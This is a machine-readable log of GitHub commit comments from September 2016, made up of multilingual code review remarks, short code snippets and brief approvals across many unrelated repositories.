{"id":"4579385766","type":"CommitCommentEvent","actor":{"login":"moh0sw"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19069543,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T06:55:42Z","updated_at":"2016-09-18T06:55:42Z","body":"@rodrial12 you need to resign the ipa with ios app signer before you install it"}},"created_at":"2016-09-18T06:55:42Z"}
{"id":"4579386278","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069544,"position":33,"line":70,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringConnection.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:56:04Z","updated_at":"2016-09-18T06:56:04Z","body":"ConcurrentHashMap is perfectly thread safe, but i noticed there were a couple places below where the code was explicitly synchronizing on these maps. That doesn't really work to protect the maps from modification in those areas as map.put for example will not block while another thread has synchronized a ConcurrentHashMap. I believe switching these to synchronized maps provides the protection that was truly intended in this class."}},"created_at":"2016-09-18T06:56:04Z"}
{"id":"4579386521","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069545,"position":17,"line":63,"path":"app/scripts/react/reducers/cart.js","commit_id":"498f24c072225f0b6bc527cdf3913f8eae4dc249","created_at":"2016-09-18T06:56:13Z","updated_at":"2016-09-18T06:56:13Z","body":"вот уж количество строчек сократилось )"}},"created_at":"2016-09-18T06:56:13Z"}
{"id":"4579387370","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069546,"position":199,"line":555,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T06:56:53Z","updated_at":"2016-09-18T06:56:53Z","body":"не понимаю что тут происходит "}},"created_at":"2016-09-18T06:56:53Z"}
{"id":"4579388152","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069547,"position":66,"line":71,"path":"app/scripts/react/components/Cart/Cart.jsx","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T06:57:30Z","updated_at":"2016-09-18T06:57:30Z","body":"А что это за цены в корзину попадают? не понятно"}},"created_at":"2016-09-18T06:57:30Z"}
{"id":"4579388520","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069550,"position":162,"line":690,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringConnection.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:57:47Z","updated_at":"2016-09-18T06:57:47Z","body":"it appears these methods were synchronized in an effort to protect this.recordedBindings. I removed the object level synchronizations and put them just around access to recordedBindings"}},"created_at":"2016-09-18T06:57:47Z"}
{"id":"4579388540","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069551,"position":66,"line":71,"path":"app/scripts/react/components/Cart/Cart.jsx","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T06:57:48Z","updated_at":"2016-09-18T06:57:48Z","body":"У корзины есть список товаров, а цены отдельно от товаров это как?"}},"created_at":"2016-09-18T06:57:48Z"}
{"id":"4579389273","type":"CommitCommentEvent","actor":{"login":"blongho"},"repo":{"name":"MaDickal/Python-for-Informatics-Exercise-4.7"},"payload":{"comment":{"id":19069554,"position":null,"line":null,"path":null,"commit_id":"96e0bdc951894d420d6f167a0d0a2f91d494c50c","created_at":"2016-09-18T06:58:20Z","updated_at":"2016-09-18T06:58:20Z","body":"Hi MaDickal,\r\nYou code needs modification. \r\nline 4: What if code is less than zero, say -1? You get the answer \"None\" as that is not defined in your function. \r\n\r\nMy modification:\r\n`# score to grade conversion\r\ndef computegrade(score):\r\n    if score > 1.0:\r\n        return 'Bad value! Your score has to be between 0.0 to 1.0'\r\n    elif score >= 0.9 and score <= 1.0:\r\n        return 'A'\r\n    elif score >= 0.8 and score < 0.9:\r\n        return 'B'\r\n    elif score >= 0.7 and score < 0.8:\r\n        return 'C'\r\n    elif score >= 0.6 and score < 0.7:\r\n        return 'D'\r\n    elif score >= 0.0 and score < 0.6 :\r\n        return 'F'\r\n\r\n#Repeately ask for score. \r\nwhile True:\r\n    try:\r\n        score = float(input('Enter your score: ')) #input should be float. Otherwise <except ValueError>\r\n        grade = computegrade(score)\r\n        print(grade)\r\n    except ValueError:\r\n        print('You must enter a number')\r\n`\r\n"}},"created_at":"2016-09-18T06:58:20Z"}
{"id":"4579389464","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069555,"position":12,"line":12,"path":"app/scripts/react/actions/PackagesActions.js","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T06:58:30Z","updated_at":"2016-09-18T06:58:30Z","body":"а зачем camelizeKeys?"}},"created_at":"2016-09-18T06:58:30Z"}
{"id":"4579390607","type":"CommitCommentEvent","actor":{"login":"mwhittaker"},"repo":{"name":"mwhittaker/aries"},"payload":{"comment":{"id":19069561,"position":null,"line":null,"path":null,"commit_id":"e97972673efd34be98678fa6770011c83a2d0200","created_at":"2016-09-18T06:59:23Z","updated_at":"2016-09-18T06:59:23Z","body":"Lovely commit! The `args` thing was definitely weird. "}},"created_at":"2016-09-18T06:59:23Z"}
{"id":"4579390812","type":"CommitCommentEvent","actor":{"login":"laohyx"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":19069564,"position":15,"line":37,"path":"manifest.json","commit_id":"1b73fc324f6d4c009678be0d620b8248d8abafa6","created_at":"2016-09-18T06:59:34Z","updated_at":"2016-09-18T06:59:34Z","body":"哦~那很好！\r\n以前听力是可以用chrome的。\r\n但估计现在题目都换了。。估计不能用了"}},"created_at":"2016-09-18T06:59:34Z"}
{"id":"4579391404","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19069566,"position":null,"line":null,"path":null,"commit_id":"5710b230a2a0f2b29553fbf94af5147a2e030f44","created_at":"2016-09-18T06:59:56Z","updated_at":"2016-09-18T06:59:56Z","body":"👍 "}},"created_at":"2016-09-18T06:59:56Z"}
{"id":"4579391550","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069567,"position":200,"line":788,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringConnection.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T07:00:04Z","updated_at":"2016-09-18T07:00:04Z","body":"here is the fix for issue #1 @ https://groups.google.com/forum/#!topic/rabbitmq-users/7P5fYQLLP6g.\r\n\r\nThe recorded auto delete queue is removed on consumer.close(), but the bindings for that queue never got cleaned up. When recovery happended, it then tries to attemp a binding recovery for a queue that does not exist. The deleteRecordedQueue method already handles deleting the bindings."}},"created_at":"2016-09-18T07:00:04Z"}
{"id":"4579391979","type":"CommitCommentEvent","actor":{"login":"gustamora"},"repo":{"name":"gustamora/bob-johan-c-harahap"},"payload":{"comment":{"id":19069568,"position":1,"line":1,"path":"README.md","commit_id":"675d6e6c68e9b9086d9020f77e0973cde742b3d7","created_at":"2016-09-18T07:00:17Z","updated_at":"2016-09-18T07:00:17Z","body":"setTransitionEndSupport"}},"created_at":"2016-09-18T07:00:17Z"}
{"id":"4579392407","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069578,"position":7,"line":7,"path":"app/scripts/render.static.js","commit_id":"5231c254838468eae53cadd018a1074fc2c7f6a2","created_at":"2016-09-18T07:00:32Z","updated_at":"2016-09-18T07:00:32Z","body":"Выдели пожалуйста эти данные в отельный файл. Например `mocks/cart_container.js`"}},"created_at":"2016-09-18T07:00:32Z"}
{"id":"4579392843","type":"CommitCommentEvent","actor":{"login":"CheckYourScreen"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19069588,"position":4,"line":407,"path":"net/bluetooth/hci_conn.c","commit_id":"336e979af999c60f24148b8c611f8211e766c422","created_at":"2016-09-18T07:00:48Z","updated_at":"2016-09-18T07:00:48Z","body":"memcpy(cp.ltk, ltk, sizeof(cp.ltk));"}},"created_at":"2016-09-18T07:00:48Z"}
{"id":"4579393942","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069591,"position":5,"line":60,"path":"src/main/java/com/rabbitmq/client/impl/recovery/RecordedConsumer.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T07:01:32Z","updated_at":"2016-09-18T07:01:32Z","body":"i believe getDelegate() is what is truly wanted here and on RecordedQueue. Otherwise we end up unnecessarily creating and adding a new RecordedEntity. Note, all other recorded entities already use getDelegate()"}},"created_at":"2016-09-18T07:01:32Z"}
{"id":"4579394217","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"vofus/training_final-task"},"payload":{"comment":{"id":19069592,"position":19,"line":66,"path":"app/core/dataStore.factory.js","commit_id":"cba8e4db75b4ac58fdfb6fa14d9a22d27f44cd79","created_at":"2016-09-18T07:01:43Z","updated_at":"2016-09-18T07:01:43Z","body":"Из forEach так не получится выйти. Чтобы не ходить по всему массиву можно использовать цикл `while `или методе `some`.\r\nhttp://www.jsnoob.com/2013/11/26/how-to-break-the-foreach/"}},"created_at":"2016-09-18T07:01:43Z"}
{"id":"4579394321","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069593,"position":17,"line":41,"path":"src/main/java/com/rabbitmq/utility/Utility.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T07:01:47Z","updated_at":"2016-09-18T07:01:47Z","body":"method in parent is synchronized"}},"created_at":"2016-09-18T07:01:47Z"}
{"id":"4579394682","type":"CommitCommentEvent","actor":{"login":"mwhittaker"},"repo":{"name":"mwhittaker/aries"},"payload":{"comment":{"id":19069595,"position":null,"line":null,"path":null,"commit_id":"63128c067c52b1e0d7a67ea4f356dfb69029f162","created_at":"2016-09-18T07:02:02Z","updated_at":"2016-09-18T07:02:02Z","body":":clap: "}},"created_at":"2016-09-18T07:02:02Z"}
{"id":"4579394902","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069597,"position":43,"line":50,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"36dbf81ab106ad2537afc23e9d693814123df21d","created_at":"2016-09-18T07:02:10Z","updated_at":"2016-09-18T07:02:10Z","body":"Это как? Не понял"}},"created_at":"2016-09-18T07:02:10Z"}
{"id":"4579397007","type":"CommitCommentEvent","actor":{"login":"MichaelSmeaton"},"repo":{"name":"MichaelSmeaton/top-secret"},"payload":{"comment":{"id":19069599,"position":null,"line":null,"path":null,"commit_id":"d99082949ca1fb8e35c0405bf5242720ed21c1d2","created_at":"2016-09-18T07:03:02Z","updated_at":"2016-09-18T07:03:02Z","body":"![pep8 validation](https://cloud.githubusercontent.com/assets/13824666/18613619/5f34e962-7d4c-11e6-88c1-609cb6be3fb7.png)\r\n"}},"created_at":"2016-09-18T07:03:02Z"}
{"id":"4579397319","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069600,"position":43,"line":50,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"ceffdd3ffd2f488c360fcc20d5b51e9d73e41800","created_at":"2016-09-18T07:03:13Z","updated_at":"2016-09-18T07:03:13Z","body":"также нельзя делать "}},"created_at":"2016-09-18T07:03:13Z"}
{"id":"4579397439","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19069601,"position":null,"line":null,"path":null,"commit_id":"2e0b97659600b2f73bb927b7b0939c27446deda5","created_at":"2016-09-18T07:03:18Z","updated_at":"2016-09-18T07:03:18Z","body":"LGTM"}},"created_at":"2016-09-18T07:03:18Z"}
{"id":"4579397798","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069603,"position":11,"line":42,"path":"app/scripts/react/reducers/cart.js","commit_id":"b1f1a5e597c09ca0c64075032482a4513848dee5","created_at":"2016-09-18T07:03:36Z","updated_at":"2016-09-18T07:03:36Z","body":"Тут что-то очень сложное происходит, я не понимаю.."}},"created_at":"2016-09-18T07:03:36Z"}
{"id":"4579398338","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069605,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-18T07:03:58Z","updated_at":"2016-09-18T07:03:58Z","body":"a) das war die minimale Änderung die VMC und andere wieder lauffähig gemacht hat.\r\nb) das python-enterprise war gebaut und war auf dem Feed - es war lediglich nicht installiert.\r\nc) die Änderung wurde vor dem commit hier getestet\r\nd) Nicht alle Image Teams bauen aus der oe-a und nicht alle plugins werden mit bitbake gebaut\r\ne) Daher würde eine Änderung der depends dann ggf. in anderen Images nicht mehr funktionieren wenn diese eben nicht die gleiche python-twisted Version einsetzen"}},"created_at":"2016-09-18T07:03:58Z"}
{"id":"4579398617","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069607,"position":11,"line":42,"path":"app/scripts/react/reducers/cart.js","commit_id":"755d45a95e72698402f570b7383490c46788ccec","created_at":"2016-09-18T07:04:08Z","updated_at":"2016-09-18T07:04:08Z","body":"ЗАчем это?"}},"created_at":"2016-09-18T07:04:08Z"}
{"id":"4579399643","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19069608,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T07:04:58Z","updated_at":"2016-09-18T07:04:58Z","body":"Just for the record: this means that legacy GHC installations (i.e. those before GHC 7.8) will be forced to use a newer `cabal`. Not a big deal, just pointing out."}},"created_at":"2016-09-18T07:04:58Z"}
{"id":"4579400306","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069612,"position":25,"line":115,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"bf918496b5d56c078db56b3b366186c907e2d31a","created_at":"2016-09-18T07:05:29Z","updated_at":"2016-09-18T07:05:29Z","body":"это же все делается через deafultsя в propTypes?"}},"created_at":"2016-09-18T07:05:29Z"}
{"id":"4579400702","type":"CommitCommentEvent","actor":{"login":"Kofotsmordarn"},"repo":{"name":"ineentho/textspel"},"payload":{"comment":{"id":19069615,"position":null,"line":null,"path":null,"commit_id":"306d5ceeb19e58e3e18ddb0953cd32f4fdfa5c62","created_at":"2016-09-18T07:05:48Z","updated_at":"2016-09-18T07:05:48Z","body":"Vi har kopierat samma prefixer till magical vapen, offhand och trinket nu... Kanske man kan ha en fil för det istället?"}},"created_at":"2016-09-18T07:05:48Z"}
{"id":"4579400958","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19069617,"position":null,"line":null,"path":null,"commit_id":"3adfb03a0e7584a74b27994ee0f2dbe195b6ad55","created_at":"2016-09-18T07:06:00Z","updated_at":"2016-09-18T07:06:00Z","body":"it was on the feeds - no need to add every package to the feeds bb"}},"created_at":"2016-09-18T07:06:00Z"}
{"id":"4579401193","type":"CommitCommentEvent","actor":{"login":"auvipy"},"repo":{"name":"celery/celery"},"payload":{"comment":{"id":19069619,"position":null,"line":null,"path":null,"commit_id":"fff12f08af8539c3e2e3c73733e69ce26e98194a","created_at":"2016-09-18T07:06:09Z","updated_at":"2016-09-18T07:06:09Z","body":"+1 for 1.8+ only "}},"created_at":"2016-09-18T07:06:09Z"}
{"id":"4579401459","type":"CommitCommentEvent","actor":{"login":"ndmitchell"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19069621,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T07:06:19Z","updated_at":"2016-09-18T07:06:19Z","body":"The latest Cabal HEAD is claiming it was required for extra docs anyway - so maybe we already had that requirement and just didn't notice it?"}},"created_at":"2016-09-18T07:06:19Z"}
{"id":"4579401611","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeslaRom-N/vendor_tesla"},"payload":{"comment":{"id":19069622,"position":null,"line":null,"path":null,"commit_id":"2ebecc5aa37a77d1ba65eb38c860cd3f1839ec6b","created_at":"2016-09-18T07:06:26Z","updated_at":"2016-09-18T07:06:26Z","body":"Hah, yeah i know. Was going to fix it but then something came up ;-)"}},"created_at":"2016-09-18T07:06:26Z"}
{"id":"4579402361","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069636,"position":5,"line":18,"path":"app/scripts/react/components/Checkout/CheckoutDeliveries.jsx","commit_id":"94ffd75c3bce03a8536dcd16d3005504ea704047","created_at":"2016-09-18T07:06:59Z","updated_at":"2016-09-18T07:06:59Z","body":"Почему так?"}},"created_at":"2016-09-18T07:06:59Z"}
{"id":"4579402539","type":"CommitCommentEvent","actor":{"login":"Kofotsmordarn"},"repo":{"name":"ineentho/textspel"},"payload":{"comment":{"id":19069638,"position":null,"line":null,"path":null,"commit_id":"306d5ceeb19e58e3e18ddb0953cd32f4fdfa5c62","created_at":"2016-09-18T07:07:06Z","updated_at":"2016-09-18T07:07:06Z","body":"BTW trinkets borde ha egna prefixer eftersom dem inte ska vara lika bra som offhand "}},"created_at":"2016-09-18T07:07:06Z"}
{"id":"4579403479","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069644,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T07:07:46Z","updated_at":"2016-09-18T07:07:46Z","body":"зачем  camelizeKeys? Из API уже должны приходить camelized"}},"created_at":"2016-09-18T07:07:46Z"}
{"id":"4579403943","type":"CommitCommentEvent","actor":{"login":"Kofotsmordarn"},"repo":{"name":"ineentho/textspel"},"payload":{"comment":{"id":19069645,"position":null,"line":null,"path":null,"commit_id":"ada7f9242d88f1a6592c4a1daa48280f873c6b93","created_at":"2016-09-18T07:08:08Z","updated_at":"2016-09-18T07:08:08Z","body":"Varför har Helmbuttarna varandras ID?? "}},"created_at":"2016-09-18T07:08:08Z"}
{"id":"4579404186","type":"CommitCommentEvent","actor":{"login":"CatalinFrancu"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":19069646,"position":null,"line":null,"path":null,"commit_id":"c7c68577dce82d1461bfeb086c505259d2d09544","created_at":"2016-09-18T07:08:18Z","updated_at":"2016-09-18T07:08:18Z","body":"Mișto! La ce o vom folosi? :-)\r\n\r\nO optimizez eu cu optipng."}},"created_at":"2016-09-18T07:08:18Z"}
{"id":"4579404290","type":"CommitCommentEvent","actor":{"login":"NerimaRentai"},"repo":{"name":"NerimaRentai/our_project"},"payload":{"comment":{"id":19069647,"position":null,"line":null,"path":null,"commit_id":"483b3214f3661ef2d1efad5863814c30aa4a3a71","created_at":"2016-09-18T07:08:23Z","updated_at":"2016-09-18T07:08:23Z","body":"かいた"}},"created_at":"2016-09-18T07:08:23Z"}
{"id":"4579404544","type":"CommitCommentEvent","actor":{"login":"NerimaRentai"},"repo":{"name":"NerimaRentai/our_project"},"payload":{"comment":{"id":19069649,"position":4,"line":4,"path":"hello.txt","commit_id":"483b3214f3661ef2d1efad5863814c30aa4a3a71","created_at":"2016-09-18T07:08:34Z","updated_at":"2016-09-18T07:08:34Z","body":"OK"}},"created_at":"2016-09-18T07:08:34Z"}
{"id":"4579406204","type":"CommitCommentEvent","actor":{"login":"newcoderincoding"},"repo":{"name":"Xett575/BeginersJava"},"payload":{"comment":{"id":19069653,"position":null,"line":null,"path":null,"commit_id":"1985a5859d9b2cfe252e769f8c5d2a9a9bd878c4","created_at":"2016-09-18T07:09:58Z","updated_at":"2016-09-18T07:09:58Z","body":"why did you made it all so complicated?"}},"created_at":"2016-09-18T07:09:58Z"}
{"id":"4579406787","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/testbext"},"payload":{"comment":{"id":19069655,"position":null,"line":null,"path":null,"commit_id":"9ec48de9b0c604cb0207b8a5f4d6922ea635d59b","created_at":"2016-09-18T07:10:20Z","updated_at":"2016-09-18T07:10:20Z","body":"> Vamos bien! 💛 "}},"created_at":"2016-09-18T07:10:20Z"}
{"id":"4579406799","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19069656,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T07:10:21Z","updated_at":"2016-09-18T07:10:21Z","body":"extra docs is a top-level property that should get ignored by older cabal-versions (they should emit a warning though); however,  `cabal-version: >=1.18` denotes that this .cabal file MUST be read by a new enough cabal version, otherwise \"critical\" information may not be interpreted correctly. newer cabal versions should honour extra-docs regardless of `cabal-version: >=1.10`. In this cases it's a judgement call whether to set the `cabal-version` stricter or allow for some best-effort semantics. I suspect this isn't documented anywhere yet though... :-)"}},"created_at":"2016-09-18T07:10:21Z"}
{"id":"4579407590","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069658,"position":35,"line":35,"path":"app/scripts/react/reducers/cart.js","commit_id":"046407d44ce875440ba4e9765cf8e0a93c87f528","created_at":"2016-09-18T07:11:00Z","updated_at":"2016-09-18T07:11:00Z","body":"Если из API приходят неверные типы данных нужно писать API чтобы отдавал только нужные"}},"created_at":"2016-09-18T07:11:00Z"}
{"id":"4579408416","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19069666,"position":null,"line":null,"path":null,"commit_id":"25c0babb58d509c991a218c97fe6089ced25e1e8","created_at":"2016-09-18T07:11:34Z","updated_at":"2016-09-18T07:11:34Z","body":"//PROGRAM 2 \r\nimport java.io.*;\r\nimport java.lang.*;\r\nclass Sample1\r\n{\r\npublic void intRange(int x,int y)\r\n   {\r\n    boolean a = (x>=10&&x<=20 || y>=10&&y<=20);\r\n    System.out.println(a);\r\n   }\r\n }\r\n class Sample\r\n {\r\n  public static void main(String args[])\r\n  {\r\n   Sample1 b=new Sample1();\r\n   b.intRange(20,30);\r\n  }\r\n }\r\n"}},"created_at":"2016-09-18T07:11:34Z"}
{"id":"4579408419","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069667,"position":35,"line":35,"path":"app/scripts/react/reducers/cart.js","commit_id":"046407d44ce875440ba4e9765cf8e0a93c87f528","created_at":"2016-09-18T07:11:35Z","updated_at":"2016-09-18T07:11:35Z","body":"count и weight одновременно не могут использоваться вообще"}},"created_at":"2016-09-18T07:11:35Z"}
{"id":"4579409761","type":"CommitCommentEvent","actor":{"login":"HyGlobalHD"},"repo":{"name":"ArchRPG/ARCore"},"payload":{"comment":{"id":19069673,"position":null,"line":null,"path":null,"commit_id":"79f015e5f427d3ed130d9891c1ca7464052bb512","created_at":"2016-09-18T07:12:37Z","updated_at":"2016-09-18T07:12:37Z","body":"We might need to fix Minibosses code .."}},"created_at":"2016-09-18T07:12:37Z"}
{"id":"4579410132","type":"CommitCommentEvent","actor":{"login":"long989"},"repo":{"name":"square/retrofit"},"payload":{"comment":{"id":19069676,"position":null,"line":null,"path":null,"commit_id":"c03b3e50d5fe525bc2b5e3bbe1d306a38f176282","created_at":"2016-09-18T07:12:56Z","updated_at":"2016-09-18T07:12:56Z","body":" JakeWharton"}},"created_at":"2016-09-18T07:12:56Z"}
{"id":"4579410157","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot-demo-projects"},"payload":{"comment":{"id":19069677,"position":null,"line":null,"path":null,"commit_id":"10fcf1629ba8e27f9068ca13f207d1255ce9acdb","created_at":"2016-09-18T07:12:59Z","updated_at":"2016-09-18T07:12:59Z","body":"Thanks, though a PR wouldn't have hurt as it would have been merged already :)"}},"created_at":"2016-09-18T07:12:59Z"}
{"id":"4579413429","type":"CommitCommentEvent","actor":{"login":"cjq002"},"repo":{"name":"cjq002/Sacn-QRCode-BarCode"},"payload":{"comment":{"id":19069686,"position":null,"line":null,"path":null,"commit_id":"9dc9be6a03358f64401fb8cf69e3a602283d5558","created_at":"2016-09-18T07:15:30Z","updated_at":"2016-09-18T07:15:30Z","body":"@PureCoderPan 嗯，非常感谢！"}},"created_at":"2016-09-18T07:15:30Z"}
{"id":"4579414153","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069687,"position":106,"line":106,"path":"app/scripts/react/components/Pagination/Pagination.jsx","commit_id":"7feb569a9af805eba94fbf89a9dfcbaa38fc4495","created_at":"2016-09-18T07:16:02Z","updated_at":"2016-09-18T07:16:02Z","body":"@aleksxor какую либку лучше использовать для обработки путей?"}},"created_at":"2016-09-18T07:16:02Z"}
{"id":"4579415247","type":"CommitCommentEvent","actor":{"login":"lollar"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19069691,"position":50,"line":50,"path":"Dealer.java","commit_id":"8379ad6db6ba9235c08d49a62041b4434c1eabc7","created_at":"2016-09-18T07:16:41Z","updated_at":"2016-09-18T07:16:41Z","body":"Hey Eugene,\r\n\r\nI don't think this is finished but I think we can very easily implement something like this into the `pickUpCards` method to help clean it up.  Let me know what you think:\r\n\r\n```\r\nswitch (col) {\r\n  case 1: pickUpColumn([3, 1, 2])\r\n          break;\r\n  case 2: pickUpColumn([1, 2, 3])\r\n          break;\r\n  case 3: pickUpColumn([1, 3, 2])\r\n          break;\r\n  default:\r\n          IllegalArgumentError(\"Blah\");\r\n}\r\n\r\npublic static void pickUpColumn(columnArray){\r\n  for(int i = 0; i < columnArray.length; i++){\r\n    for(int j = 0; j < 7 j++){\r\n      cards21.addCard(dealtCards[i]);\r\n    }\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-18T07:16:41Z"}
{"id":"4579417886","type":"CommitCommentEvent","actor":{"login":"Danielzo"},"repo":{"name":"sunnankar/bm"},"payload":{"comment":{"id":19069697,"position":null,"line":null,"path":null,"commit_id":"f155c1a6570c15db49fdc865fcfd163caed0efea","created_at":"2016-09-18T07:18:40Z","updated_at":"2016-09-18T07:18:40Z","body":"![antminer-s-new-r-model-designed-to-be-used-in-homes-decrease-centralization](https://cloud.githubusercontent.com/assets/17010699/18613738/4252ff7c-7d89-11e6-8f5b-809ad503a7b0.jpg)\r\n"}},"created_at":"2016-09-18T07:18:40Z"}
{"id":"4579418524","type":"CommitCommentEvent","actor":{"login":"lollar"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19069701,"position":50,"line":50,"path":"Dealer.java","commit_id":"8379ad6db6ba9235c08d49a62041b4434c1eabc7","created_at":"2016-09-18T07:19:13Z","updated_at":"2016-09-18T07:19:13Z","body":"obviously columnArray doesn't have a dealtCards method but I think this gets the point across well enough. "}},"created_at":"2016-09-18T07:19:13Z"}
{"id":"4579418763","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot-demo-projects"},"payload":{"comment":{"id":19069702,"position":null,"line":null,"path":null,"commit_id":"10fcf1629ba8e27f9068ca13f207d1255ce9acdb","created_at":"2016-09-18T07:19:25Z","updated_at":"2016-09-18T07:19:25Z","body":"Fixed in 80aea98"}},"created_at":"2016-09-18T07:19:25Z"}
{"id":"4579420691","type":"CommitCommentEvent","actor":{"login":"fabioperalta"},"repo":{"name":"fabioperalta/fodapp"},"payload":{"comment":{"id":19069707,"position":null,"line":null,"path":null,"commit_id":"8a53d7a751bf434e196df88320c6b4c4ba3f445b","created_at":"2016-09-18T07:20:48Z","updated_at":"2016-09-18T07:20:48Z","body":"gege"}},"created_at":"2016-09-18T07:20:48Z"}
{"id":"4579422066","type":"CommitCommentEvent","actor":{"login":"aritaku"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069711,"position":18,"line":18,"path":"tableview_cell_edit/DetailViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T07:21:39Z","updated_at":"2016-09-18T07:21:39Z","body":"certainly ```let``` is better. thank you!"}},"created_at":"2016-09-18T07:21:39Z"}
